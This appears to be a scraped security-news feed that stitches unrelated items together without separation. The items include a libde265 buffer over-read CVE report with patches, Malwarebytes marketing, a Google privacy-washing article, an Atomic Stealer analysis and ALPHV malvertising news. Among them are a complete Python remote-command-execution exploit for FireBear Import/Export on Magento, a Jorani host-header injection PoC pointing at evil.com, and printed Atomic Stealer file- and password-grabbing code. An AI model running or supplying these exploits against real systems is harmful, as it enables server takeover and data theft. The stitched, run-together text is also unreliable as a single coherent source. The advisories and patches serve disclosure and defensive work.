Libde265 v1.0.12 was discovered to contain multiple buffer overflows via the num_tile_columns and num_tile_row parameters in the function pic_parameter_set::dump.

**Summary**

There is a segmentation fault caused by a buffer over-read on pic\_parameter\_set::dump due to an incorrect value of num\_tile\_columns or num\_tile\_rows.

**Tested with:**

*   Commit: 6fc550f (master)
*   PoC: poc
*   cmd: ./dec265 -d poc

**Crash output:**

    INFO: ----------------- SPS -----------------
    INFO: video_parameter_set_id  : 0
    INFO: sps_max_sub_layers      : 1
    INFO: sps_temporal_id_nesting_flag : 1
    INFO:   general_profile_space     : 0
    INFO:   general_tier_flag         : 0
    INFO:   general_profile_idc       : Main
    INFO:   general_profile_compatibility_flags: 0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
    INFO:     general_progressive_source_flag : 0
    INFO:     general_interlaced_source_flag : 0
    INFO:     general_non_packed_constraint_flag : 0
    INFO:     general_frame_only_constraint_flag : 0
    INFO:   general_level_idc         : 60 (2.00)
    INFO: seq_parameter_set_id    : 0
    INFO: chroma_format_idc       : 1 (4:2:0)
    INFO: pic_width_in_luma_samples  : 416
    INFO: pic_height_in_luma_samples : 240
    INFO: conformance_window_flag    : 1
    INFO: conf_win_left_offset  : 0
    INFO: conf_win_right_offset : 0
    INFO: conf_win_top_offset   : 0
    INFO: conf_win_bottom_offset: 0
    INFO: bit_depth_luma   : 10
    INFO: bit_depth_chroma : 9
    INFO: log2_max_pic_order_cnt_lsb : 4
    INFO: sps_sub_layer_ordering_info_present_flag : 1
    INFO: Layer 0
    INFO:   sps_max_dec_pic_buffering      : 5
    INFO:   sps_max_num_reorder_pics       : 3
    INFO:   sps_max_latency_increase_plus1 : 0
    INFO: log2_min_luma_coding_block_size : 3
    INFO: log2_diff_max_min_luma_coding_block_size : 1
    INFO: log2_min_transform_block_size   : 2
    INFO: log2_diff_max_min_transform_block_size : 2
    INFO: max_transform_hierarchy_depth_inter : 0
    INFO: max_transform_hierarchy_depth_intra : 0
    INFO: scaling_list_enable_flag : 0
    INFO: amp_enabled_flag                    : 1
    INFO: sample_adaptive_offset_enabled_flag : 1
    INFO: pcm_enabled_flag                    : 0
    INFO: num_short_term_ref_pic_sets : 11
    INFO: ref_pic_set[  0 ]: X...X.X.X.......|................
    INFO: ref_pic_set[  1 ]: ..........X.X...|...X............
    INFO: ref_pic_set[  2 ]: ............X.X.|.X...X..........
    INFO: ref_pic_set[  3 ]: ...............X|X.X...X.........
    INFO: ref_pic_set[  4 ]: .............X.X|X...X...........
    INFO: ref_pic_set[  5 ]: ..........X.X.X.|.X..............
    INFO: ref_pic_set[  6 ]: ...........X...X|X.X.............
    INFO: ref_pic_set[  7 ]: .............X..|X.X.X...........
    INFO: ref_pic_set[  8 ]: ........X.......|................
    INFO: ref_pic_set[  9 ]: ............X...|...X............
    INFO: ref_pic_set[ 10 ]: ..............X.|.X...X..........
    INFO: long_term_ref_pics_present_flag : 0
    INFO: sps_temporal_mvp_enabled_flag      : 1
    INFO: strong_intra_smoothing_enable_flag : 1
    INFO: vui_parameters_present_flag        : 1
    INFO: sps_extension_present_flag    : 0
    INFO: sps_range_extension_flag      : 0
    INFO: sps_multilayer_extension_flag : 0
    INFO: sps_extension_6bits           : 0
    INFO: CtbSizeY     : 16
    INFO: MinCbSizeY   : 8
    INFO: MaxCbSizeY   : 16
    INFO: MinTBSizeY   : 4
    INFO: MaxTBSizeY   : 16
    INFO: PicWidthInCtbsY         : 26
    INFO: PicHeightInCtbsY        : 15
    INFO: SubWidthC               : 2
    INFO: SubHeightC              : 2
    INFO: ----------------- VUI -----------------
    INFO: sample aspect ratio        : 0:0
    INFO: overscan_info_present_flag : 0
    INFO: overscan_appropriate_flag  : 0
    INFO: video_signal_type_present_flag: 0
    INFO: chroma_loc_info_present_flag: 0
    INFO: neutral_chroma_indication_flag: 0
    INFO: field_seq_flag                : 0
    INFO: frame_field_info_present_flag : 0
    INFO: default_display_window_flag   : 1
    INFO:   def_disp_win_left_offset    : 0
    INFO:   def_disp_win_right_offset   : 0
    INFO:   def_disp_win_top_offset     : 0
    INFO:   def_disp_win_bottom_offset  : 0
    INFO: vui_timing_info_present_flag  : 0
    INFO: vui_poc_proportional_to_timing_flag : 0
    INFO: vui_num_ticks_poc_diff_one          : 1
    INFO: vui_hrd_parameters_present_flag : 0
    INFO: bitstream_restriction_flag         : 0
    INFO: ----------------- PPS -----------------
    INFO: pic_parameter_set_id       : 0
    INFO: seq_parameter_set_id       : 0
    INFO: dependent_slice_segments_enabled_flag : 1
    INFO: sign_data_hiding_flag      : 1
    INFO: cabac_init_present_flag    : 0
    INFO: num_ref_idx_l0_default_active : -84
    INFO: num_ref_idx_l1_default_active : 12
    INFO: pic_init_qp                : 25
    INFO: constrained_intra_pred_flag: 0
    INFO: transform_skip_enabled_flag: 1
    INFO: cu_qp_delta_enabled_flag   : 0
    INFO: pic_cb_qp_offset             : 1
    INFO: pic_cr_qp_offset             : 0
    INFO: pps_slice_chroma_qp_offsets_present_flag : 0
    INFO: weighted_pred_flag           : 0
    INFO: weighted_bipred_flag         : 1
    INFO: output_flag_present_flag     : 0
    INFO: transquant_bypass_enable_flag: 0
    INFO: tiles_enabled_flag           : 1
    INFO: entropy_coding_sync_enabled_flag: 0
    INFO: num_tile_columns    : 18815
    INFO: num_tile_rows       : 1
    INFO: uniform_spacing_flag: 1
    INFO: tile column boundaries: 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 3985 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 [1]    4017733 segmentation fault  ./dec265 -d poc
    

**Analysis**

While executing decoder_context::read_pps_NAL, parameters are read in

bool success = new\_pps->read(&reader,this);

Inside the function, there is a check when setting num_tile_columns in case it goes over DE265_MAX_TILE_COLUMNS, which is 10.

  if (tiles\_enabled\_flag) {
    num\_tile\_columns = get\_uvlc(br);
    if (num\_tile\_columns == UVLC\_ERROR ||
	num\_tile\_columns+1 > DE265\_MAX\_TILE\_COLUMNS) {
      ctx->add\_warning(DE265\_WARNING\_PPS\_HEADER\_INVALID, false);
      return false;
    }

After exiting due to reading more than DE265_MAX_TILE_COLUMNS, the headers are dumped by calling dump:

  bool success = new\_pps->read(&reader,this);

  if (param\_pps\_headers\_fd>=0) {
    new\_pps->dump(param\_pps\_headers\_fd);
  }

  if (success) {
    pps\[ (int)new\_pps->pic\_parameter\_set\_id \] = new\_pps;
  }

In dump, the following code is executed to dump the tile column boundaries:

    LOG0("tile column boundaries: ");
    for (int i=0;i<=num\_tile\_columns;i++) {
      LOG1("\*%d ",colBd\[i\]);
    }
    LOG0("\*\\n");

As previously shown, num_tile_columns while be set to a higher number than DE265_MAX_TILE_COLUMNS. colBd is defined as:

int colBd    [ DE265_MAX_TILE_COLUMNS+1 ];

Therefore, that loop will go over colBd and will print all the data pointed by the values found after the limits of colBd in memory until the end of the loop or the next memory address is invalid.

**Impact**

*   Information leak from memory
*   Crash

If using a carefully crafted exploit, the impact could be an information leak without a crash.

**Patch**

In order to prevent this, the success value should be checked before printing the information:

diff --git a/libde265/decctx.cc b/libde265/decctx.cc
index 223a6aaf..1b79adec 100644
\--- a/libde265/decctx.cc
+++ b/libde265/decctx.cc
@@ -583,11 +583,10 @@ de265\_error decoder\_context::read\_pps\_NAL(bitreader& reader)
 
   bool success = new\_pps->read(&reader,this);
 
\-  if (param\_pps\_headers\_fd>=0) {
\-    new\_pps->dump(param\_pps\_headers\_fd);
\-  }
\-
   if (success) {
+    if (param\_pps\_headers\_fd>=0) {
+      new\_pps->dump(param\_pps\_headers\_fd);
+    }
     pps\[ (int)new\_pps->pic\_parameter\_set\_id \] = new\_pps;
   }

Another possibility could be to perform length checks inside the dump function to handle the case:

diff --git a/libde265/pps.cc b/libde265/pps.cc
index de3bcda1..a5abd9b3 100644
\--- a/libde265/pps.cc
+++ b/libde265/pps.cc
@@ -903,14 +903,22 @@ void pic\_parameter\_set::dump(int fd) const
     LOG1("uniform\_spacing\_flag: %d\\n", uniform\_spacing\_flag);
 
     LOG0("tile column boundaries: ");
\-    for (int i=0;i<=num\_tile\_columns;i++) {
\-      LOG1("\*%d ",colBd\[i\]);
+    if (num\_tile\_columns+1 > DE265\_MAX\_TILE\_COLUMNS) {
+      LOG0("Number of tile columns is invalid");
+    } else {
+      for (int i=0;i<=num\_tile\_columns;i++) {
+        LOG1("\*%d ",colBd\[i\]);
+      }
     }
     LOG0("\*\\n");
 
     LOG0("tile row boundaries: ");
\-    for (int i=0;i<=num\_tile\_rows;i++) {
\-      LOG1("\*%d ",rowBd\[i\]);
+    if (num\_tile\_rows+1 > DE265\_MAX\_TILE\_ROWS) {
+      LOG0("Number of tile rows is invalid");
+    } else {
+      for (int i=0;i<=num\_tile\_rows;i++) {
+        LOG1("\*%d ",rowBd\[i\]);
+      }
     }
     LOG0("\*\\n");

**Other notes**

The same issue occurs with num_tile_rows.

CVE-2023-43887: Buffer over-read causes segmentation fault in pic_parameter_set::dump · Issue #418 · strukturag/libde265

Here are the innovations we’ve made in our products recently. Are you making the most of them?

At Malwarebytes, we’re constantly evolving to protect our customers. These days, our products don’t just protect you from malware, we protect your identity, defend you from ads, safeguard your social media, and keep your mobile safe too.

Here are the innovations we’ve made in our products recently. Are you making the most of them?

****Malwarebytes Premium******Windows**

**Tamper** / **Uninstall Protection**. This allows you to password protect your software so that it can’t be removed remotely.

**Trusted Advisor**. This dashboard provides an easy-to-understand assessment of your computer’s security with a single comprehensive protection score, and clear, expert-driven advice.

**Brute Force Protection**. This blocks Remote Desktop Protocol (RDP) attacks, which are attempts by cybercriminals to access a computer remotely. We do this by blocking IP addresses that exceed a threshold of invalid login attempts.

**Smart Scan.** This enables you to schedule scans at a time when you’re not using your computer, which is best for productivity.

**Mac**

The old adage about Macs not getting viruses is simply not true. Macs need protection too and our **Premium for Mac** is now compatible with macOS Sonoma.

**Mobile Security**

Whether you’re on iOS or Android, our Mobile Security app just got an upgrade. Our **Premium Plus** plan now includes a full-featured VPN to help keep your connections private, no matter where you are. Using the latest VPN technology, WireGuard® protocol, you can enjoy better online privacy at a quicker speed than traditional VPNs.

What you get with our apps:

*   **Android:** Scan for viruses and malware, and detect ransomware, android exploits, phishing scams, and even potentially unwanted apps.

*   **iOS:** Detect and stop robocalls and fake texts, phishing links, malicious sites, and annoying ad trackers (while browsing in Safari).

**Browser Guard**

Available for both Windows and Mac, Malwarebytes Browser Guard is our free browser extension for Chrome, Edge, Firefox, and Safari that blocks unwanted and unsafe content, giving users a safer and faster browsing experience. It’s the world’s first browser extension to do this, while at the same time identifying and stopping tech support scams.

Browser Guard adds an extra layer to your personal security, on top of your antivirus or firewall. Because it’s a browser extension, it can offer protection in the browser that other means of protection do not have access to.

We’ve recently made enhancements to Browser Guard:

*   **Improved protection:** Stops even more threats with enhanced phishing detection. 
*   **New scanning blocks:** Prevents websites from scanning for vulnerable network ports. 
*   **Facebook support:** Blocks ads and sponsored content from appearing on Facebook feeds. 
*   **Monthly overview:** Summary showcases what has been blocked. 

On top of that, Malwarebytes Premium Security users (Windows only) can now take advantage of:

*   **Content control:** Take control of your browsing experience and define what’s appropriate for you and your family. Fully customize the content you want to block while browsing.
*   **Import and export:** Use your preferences and customized rules with all your browsers, even on other devices. This helps you to experience a consistent and clean web experience. Discover on this video how to transfer Malwarebytes Browser Guard settings to another browser.
*   **Historical Detection Statistics:** View past detections and see what we’ve protected you from.  

Want to see Browser Guard in action? Read the 25 most popular websites vs Malwarebytes Browser Guard

****Malwarebytes Identity Theft Protection****

Newly released, Malwarebytes Identity Theft Protection scours the dark web for your personal information, prevents your social media account from being hacked, and even keeps an eye on your credit (US only) — and it’s all backed by an up-to-$2 million identity theft insurance. (Insurance coverage is $1 or $2 million depending on selected package (latter only available in the US plan **Ultimate)**)

Here’s what you get (based on your selected plan):

*   Ongoing monitoring: Peace of mind that we are actively working in the background to keep you safe
*   Real-time alerts: Immediate notifications if we identify suspicious activity
*   Recommendations and best practices: Advice on how to prevent identity theft, and help if it happens
*   Identity restoration helpline and top-notch customer support.

 Malwarebytes consumer product roundup: The latest 

Google's recently been accused of "privacy washing", despite claiming its a privacy-focused company. But what is privacy washing?

Question: Who said the sentence below?

> “Privacy is at the heart of everything we do.”

Answer: Sundar Pichai, the CEO of Alphabet and its largest subsidiary Google. And if you look at the recent actions Google has announced, you’d be tempted to take his word for it:

*   An initiative to let Chrome hide your IP address.
*   Strengthening the safeguard measures for Google Workspace customers.
*   Changing data retention practices to make auto-delete the default.

But at the same time, Google is under fire because some of its actions seem half-baked. Allegedly Google’s option to “browse privately” is nothing more than a word play.

Let’s be fair. Google makes lots and lots of money by knowing what we are looking for. And to achieve that goal it needs to gather as much information as possible about us. Maybe not specifically about us as a person, but at least about us as a group.

Data are the most coveted currency of our era, and technology giants like Facebook, Google, and Amazon are considered the behemoths of the data gathering industry. If they don’t already, they want to know everything about each and every one of us.

We’re not all equally valued though. Certain milestones in a person’s life prompt major changes in buying patterns, whether that’s becoming a parent, moving home, getting married, buying a car, or going through a divorce. Some of the most personal and secretive troves of data rank as the most expensive.

In a recent blog, privacy company Proton explained how Google is spending millions lobbying and actively fighting against privacy laws that would protect you from online surveillance.

Proton used the expression, “privacy washing” which compares Google’s disparity between actions and words to those of the world’s largest environmental polluters who portray themselves as eco-conscious, known as “green washing.“

According to lobbying reports and other records, Alphabet and its subsidiaries have spent more than $125 million on federal lobbying, campaign contributions, and trade associations since 2019.

This is done under the guise that Google wants regulators to let companies decide themselves what’s good for you and for society. But so far, big tech is consistently letting us down in this regard.

A small but telling example was a recent court case where a judge ruled that car manufacturers collecting users’ text messages and call logs did not meet the Washington Privacy Act’s (WPA) standard that a plaintiff must prove that “his or her business, his or her person, or his or her reputation” has been threatened.

In other words they can steal all the data they want as long as you can’t prove that it doesn’t hurt your business, yourself or your reputation. Does that sound fair to you?

Several US states are going through the process of passing new comprehensive consumer privacy laws, in an attempt to give American citizens more control over their personal data. Privacy advisor IAPP reckons that by 2026, 13 state privacy laws will have taken effect, as newly enacted laws in Delaware, Florida, Indiana, Iowa, Montana, Oregon, Tennessee, and Texas will join California, Colorado, Connecticut, Utah, and Virginia.

The European Union (EU) is a pioneer when it comes to privacy laws, so it’s easy to see why Big Tech has spent so much money (about $30 million in 2021) lobbying European lawmakers to protect their data gathering practices. Google has been among the most aggressive to water down or slow down the expansion of consumer protections through additional regulations — in particular the Digital Markets Act, Digital Services Act, and ePrivacy Regulation. Google happily bragged about stalling the ePrivacy Regulation, which would crack down on tracking cookies.

It’s common for industries to lobby lawmakers on issues affecting their business. But there is a massive disparity in the state-by-state battle over privacy legislation between well-funded, well-organized tech lobbyists and their opposition of relatively scattered consumer advocates and privacy-minded politicians, The Markup has found.

So, Sundar Pichai, we would like you to put your money where your mouth is. And make some real changes to improve our privacy, rather than engage in privacy washing.

**We don’t just report on threats – we help safeguard your entire digital identity**

Cybersecurity risks should never spread beyond a headline. Protect your and your family’s personal information by using Malwarebytes Identity Theft Protection.

 Explained: Privacy washing 

Kibana contains an embedded version of the Chromium browser that the Reporting feature uses to generate the downloadable reports. If a user with permissions to generate reports is able to render arbitrary HTML with this browser, they may be able to leverage known Chromium vulnerabilities to conduct further attacks. Kibana contains a number of protections to prevent this browser from rendering arbitrary content.

CVE-2021-22142: Elastic Stack 7.13.0 and 6.8.16 Security Update

Compromised websites are being used to redirect to fake browser updates and deliver malware onto Mac users.

Atomic Stealer, also known as AMOS, is a popular stealer for Mac OS. Back in September, we described how malicious ads were tricking victims into downloading this piece of malware under the disguise of a popular application.

In an interesting new development, AMOS is now being delivered to Mac users via a fake browser update chain tracked as ‘ClearFake’. This may very well be the first time we see one of the main social engineering campaigns, previously reserved for Windows, branch out not only in terms of geolocation but also operating system.

With a growing list of compromised sites at their disposal, the threat actors are able to reach out a wider audience, stealing credentials and files of interest that can be monetized immediately or repurposed for additional attacks.

**Discovery**

ClearFake is a newer malware campaign that leverages compromised websites to distribute fake browser updates. It was originally discovered by Randy McEoin in August and has since gone through a number of upgrades, including the use of smart contracts to build its redirect mechanism, making it one of the most prevalent and dangerous social engineering schemes.

On November 17, security researcher Ankit Anubhav observed that ClearFake was distributed to Mac users as well with a corresponding payload:

The Safari template mimics the official Apple website and is available in different languages:

Since Google Chrome is also popular on Macs, there is a template for it which closely resembles the one used for Windows users:

**Atomic Stealer**

The payload is made for for Mac users, a DMG file purporting to be a Safari or Chrome update. Victims are instructed on how to open the file which immediately runs commands after prompting for the administrative password.

Looking at the strings from the malicious application, we can see those commands which include password and file grabbing capabilities:

find-generic-password -ga 'Chrome' | awk '{print $2}' SecKeychainSearchCopyNext:
/Chromium/Chrome /Chromium/Chrome/Local State FileGrabber tell application "Finder"
set desktopFolder to path to desktop folder
set documentsFolder to path to documents folder
set srcFiles to every file of desktopFolder whose name extension is in {"txt", "rtf", "doc", "docx", "xls", "key", "wallet", "jpg", "png", "web3", "dat"}
set docsFiles to every file of documentsFolder whose name extension is in {"txt", "rtf", "doc", "docx", "xls", "key", "wallet", "jpg", "png", "web3", "dat"}

In the same file, we can find the malware’s command and control server where the stolen data is sent to:

**Macs need protection too**

Fake browser updates have been a common theme for Windows users for years, and yet up until now the threat actors didn’t expand onto MacOS in a consistent way. The popularity of stealers such as AMOS makes it quite easy to adapt the payload to different victims, with minor adjustments.

Because ClearFake has become one of the main social engineering campaigns recently, Mac users should pay particular attention to it. We recommend leveraging web protection tools to block the malicious infrastructure associated with this threat actor.

Malwarebytes users are protected against Atomic Stealer:

**Indicators of Compromise**

Malicious domains

longlakeweb\[.\]com
chalomannoakhali\[.\]com
jaminzaidad\[.\]com
royaltrustrbc\[.\]com

AMOS stealer

4cb531bd83a1ebf4061c98f799cdc2922059aff1a49939d427054a556e89f464  
be634e786d5d01b91f46efd63e8d71f79b423bfb2d23459e5060a9532b4dcc7b

AMOS C2

194.169.175\[.\]117

 Atomic Stealer distributed to Mac users via fake browser updates 

Jorani Leave Management System version 1.0.2 suffers from a host header injection vulnerability.

    # Exploit Title: Jorani Leave Management System v1.0.2 Host Header Attack# Date: 12/11/2023# Exploit Author: BugsBD Security Researcher (Rahad Chowdhury)# Vendor Homepage: https://jorani.org/# Software Link:https://github.com/bbalet/jorani/releases/download/v1.0.2/jorani-1.0.2.zip# Version: v1.0.2# Tested on: Windows 10, PHP version: 8.2.4, Apache/2.4.56# CVE: CVE-2023-48205Descriptions:A Host Header Injection vulnerability in Jorani Leave Management System1.0.2 may allow an attacker to spoof a particular header. This can beexploited by abusing password reset emails.Steps to Reproduce:1. Request:GET /jorani/session/login HTTP/1.1Host: 192.168.1.74Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/119.0.0.0 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Sec-GPC: 1Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brCookie: csrf_cookie_jorani=6ebb2e7eeb6867e2a83f96118ca6ecb3;jorani_session=pqop598dtj85okrjvh043es6pqp1juagConnection: close2. Now change host name and check browser response. So your request datawill be:GET /jorani/session/login HTTP/1.1Host: evil.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/119.0.0.0 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Sec-GPC: 1Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brCookie: csrf_cookie_jorani=6ebb2e7eeb6867e2a83f96118ca6ecb3;jorani_session=pqop598dtj85okrjvh043es6pqp1juagConnection: close## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48205)

Jorani Leave Management System 1.0.2 Host Header Injection

FireBear Improved Import and Export version 3.8.6 for Magento 2.4.6 suffers from an XSLT server-side injection vulnerability that allows for command execution.

    Exploit Title: FireBear Improved Import & Export ver. 3.8.6 for Magento 2.4.6  - XSLT Server Side Injection Command Execution# Date: 2023-11-17# Exploit Author: tmrswrr# Vendor Homepage: https://commercemarketplace.adobe.com/# Software Link:  https://commercemarketplace.adobe.com/firebear-importexport.html# Version: FireBear ver. 3.8.6# Tested on: Magento 2.4.6Poc:https://github.com/capture0x/Magento-ver.-2.4.6/Exploit:import requestsfrom bs4 import BeautifulSoupimport reimport json import sysif len(sys.argv) != 3:    print("Usage: python exploit.py <base_url> <command>")    sys.exit(1)base_url = sys.argv[1]command = sys.argv[2]base_url = base_url.rstrip('/') + '/'login_page_url = base_url + "admin/"login_action_url = base_url + "admin/"import_job_edit_url = base_url + "import/job/edit/entity_id/21/" session = requests.Session() response = session.get(login_page_url)soup = BeautifulSoup(response.text, 'html.parser')form_key = soup.find('input', {'name': 'form_key'})['value']login_payload = {    'form_key': form_key,    'login[username]': 'demo',    'login[password]': '1q2w3e4r5t'} headers = {    'Content-Type': 'application/x-www-form-urlencoded',    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'} login_response = session.post(login_action_url, headers=headers, data=login_payload) if login_response.ok and login_response.history:    print("Login successful!")    redirected_url = login_response.url    print("Redirected URL:", redirected_url)         import_job_edit_response = session.get(import_job_edit_url)    soup = BeautifulSoup(import_job_edit_response.text, 'html.parser')    second_form_key = soup.find('input', {'name': 'form_key'})['value']    print("Extracted Key")        key = re.findall(r'key\/(.*?)\/', login_response.url)[0]         second_post_url = f"{base_url}import/job/xslt/key/{key}/?isAjax=true"            second_post_payload = f"form_data%5B%5D=file_path%2Bpub%2Fmedia%2Fimportexport%2Fh%2Fe%2Fhello_39.xml&form_data%5B%5D=xslt%2B%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0A%3Cxsl%3Astylesheet+version%3D%221.0%22%0Axmlns%3Axsl%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2FXSL%2FTransform%22%0Axmlns%3Aphp%3D%22http%3A%2F%2Fphp.net%2Fxsl%22%3E%0A%3Cxsl%3Atemplate+match%3D%22%2F%22%3E%0A%3Cxsl%3Avalue-of+select%3D%22php%3Afunction('shell_exec'%2C'{command}')%22+%2F%3E%0A%3C%2Fxsl%3Atemplate%3E%0A%3C%2Fxsl%3Astylesheet%3E&form_data%5B%5D=import_source%2Bfile&form_data%5B%5D=type_file%2Bxml&form_data%5B%5D=host%2B&form_data%5B%5D=port%2B&form_data%5B%5D=username%2B&form_data%5B%5D=password%2B&form_data%5B%5D=type_file%2Bxml&form_data%5B%5D=import_source%2Bfile&form_data%5B%5D=file_upload%2B&form_data%5B%5D=predefined_structure%2B0&form_data%5B%5D=file_path%2Bpub%2Fmedia%2Fimportexport%2Fh%2Fe%2Fhello_39.xml&form_data%5B%5D=import_images_file_dir%2B&form_data%5B%5D=scan_directory%2B0&form_data%5B%5D=deferred_images%2B0&form_data%5B%5D=delete_file_after_import%2B0&form_data%5B%5D=archive_file_after_import%2B0&form_data%5B%5D=image_import_source%2B0&form_data%5B%5D=remove_current_mappings%2B0&form_data%5B%5D=associate_child_review_to_configurable_parent_product%2B0&form_data%5B%5D=associate_child_review_to_bundle_parent_product%2B0&form_key={second_form_key}"       second_post_headers = {        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',        'Referer': import_job_edit_response.url       }         second_post_response = session.post(second_post_url, headers=second_post_headers, data=second_post_payload)         if second_post_response.ok:        print("XSL Imported!")        response_json = json.loads(second_post_response.text)                result_xml = response_json.get("result", "")        if result_xml is not None:                     result_xml = result_xml.replace("<?xml version=\"1.0\"?>", "\n")                else:                      result_xml = "No Output found in the response."                print("Output:", result_xml)            else:        print("Import failed.")        print("Status Code:", second_post_response.status_code)        print("Response:", second_post_response.text)else:    print("Login failed.") session.close()

FireBear Improved Import And Export 3.8.6 XSLT Server Side Injection

By Deeba Ahmed
Yet another day, another instance of a Google service being exploited for spreading malware infections.
This is a post from HackRead.com Read the original post: ALPHV (BlackCat) Ransomware Gang Uses Google Ads for Targeted Victims

According to eSentire, the ALPHV ransomware gang is employing the Nitrogen malware in the ongoing attacks.

Cybersecurity experts at eSentire, a leading global cybersecurity solutions provider, have published details of an ongoing attack campaign from Russian-speaking affiliates of the notorious **ALPHV (aka BlackCat)** ransomware gang.

According to eSentire’s Threat Response Unit (TRU) researchers, key targets in this campaign are public entities and corporations in the Americas and Europe. Over the last three weeks, these affiliates have breached a manufacturer, a law firm, and a warehouse provider within eSentire’s customer network, apart from other firms. However, eSentire’s security research team thwarted and neutralized these attacks.

Researchers noted that ALPHV/BlackCat threat actors gain initial access to their target’s IT networks through three methods. These include exploiting stolen or compromised login credentials to gain unauthorized access, exploiting vulnerabilities in remote management/monitoring tools to access IT systems, and browser-based attacks in which users are tricked into visiting malicious websites that deliver malware or malicious links in emails or social media posts.

Furthermore, they observed that BlackCat affiliates have expanded their attack tactics substantially to include malvertising. In this campaign, the attackers place **deceptive Google ads** promoting popular software like Advanced IP Scanner, WinSCP, Slack, or Cisco AnyConnect to trick business professionals into visiting certain websites.

In reality, these attacker-controlled websites deliver Nitrogen malware under the guise of authentic software. They lure users by placing malicious ads at the top of search results for keywords relevant to businesses, for instance, ‘ **cloud backup solutions**.’

